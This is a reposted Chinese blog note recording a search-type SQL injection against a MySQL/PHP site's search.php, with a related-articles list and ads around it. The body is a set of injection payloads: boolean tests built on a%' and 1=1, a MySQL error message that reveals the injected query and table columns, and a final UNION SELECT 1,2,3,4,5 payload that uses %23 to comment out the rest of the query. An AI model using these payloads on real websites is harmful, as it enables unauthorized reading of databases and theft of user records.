博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
mysql+php搜索型注入问题记录
阅读量:2435 次
发布时间:2019-05-10

本文共 902 字,大约阅读时间需要 3 分钟。

 http://xxx.com/search.php?dy=a%' and 1=1-- 错误
http://xxx.com/search.php?dy=a%' and 1=2-- 错误
http://xxx.com/search.php?dy=a%' and 1=1 and '%'=' 正常
http://xxx.com/search.php?dy=a%' and 1=2 and '%'=' 错误
请教如何构造语句进行order by 或者union查询等?
http://xxx.com/search.php?dy=a%' and 1=2 order by xx and '%'=' 提示错误。。
info: MySQL Query Error
Time: 2011-2-8 2:23pm
Script:
SQL: SELECT U_Id,U_Yxdm,U_Show,U_Name,U_Num FROM j_user WHERE U_Type='3' AND U_Show>'0' AND (U_Yxdm='a%' and 1=2 order by 20 and '%'='' OR U_Name LIKE '%a%' and 1=2 order by 20 and '%'='%') ORDER BY U_Num ASC
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 20 and '%'='' OR U_Name LIKE '%a%' and 1=2 order by 20 and '%'='%') ORD' at line 1
Errno.: 1064
用%23
http://xxx.com/search.php?dy=x') union select 1,2,3,4,5%23
x') union select 1,2,3,4,5#

转载地址:http://knhmb.baihongyu.com/

你可能感兴趣的文章
Word 2003 视频教程-Word 字体对齐方式(转)
查看>>
Word 2003 视频教程-Word 字体大小(转)
查看>>
Word 2003 视频教程-Word 字体设置(转)
查看>>
Word 2003 视频教程-Word 关闭文件(转)
查看>>
Word 2003 视频教程-输入文字(转)
查看>>
Word 2003 视频教程-Word 保存文件(转)
查看>>
Word 2003 视频教程-Word 自动保存(转)
查看>>
Word 2003 视频教程-Word 功能介绍(转)
查看>>
Word 2003 视频教程-Word 界面介绍(转)
查看>>
Word 2003 视频教程-Word 新建文件(转)
查看>>
Word 2003 视频教程-Word 工作区显示方式(转)
查看>>
Word 2003 视频教程(转)
查看>>
UPDATE注射(mysql+php)的两个模式(转)
查看>>
反击战:入侵者的电脑被我攻陷(转)
查看>>
战术攻防思维撷粹(2)(转)
查看>>
黑客避开检测的手段(转)
查看>>
骇客攻击:跳板攻击与防御(1)(转)
查看>>
黑客入侵计中计(转)
查看>>
谈DoS攻击和DDoS的攻击方式(转)
查看>>
Word 2003 视频教程-关闭 Word(转)
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2024-07-07 18:16:47   当前IP: 3.15.143.81   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我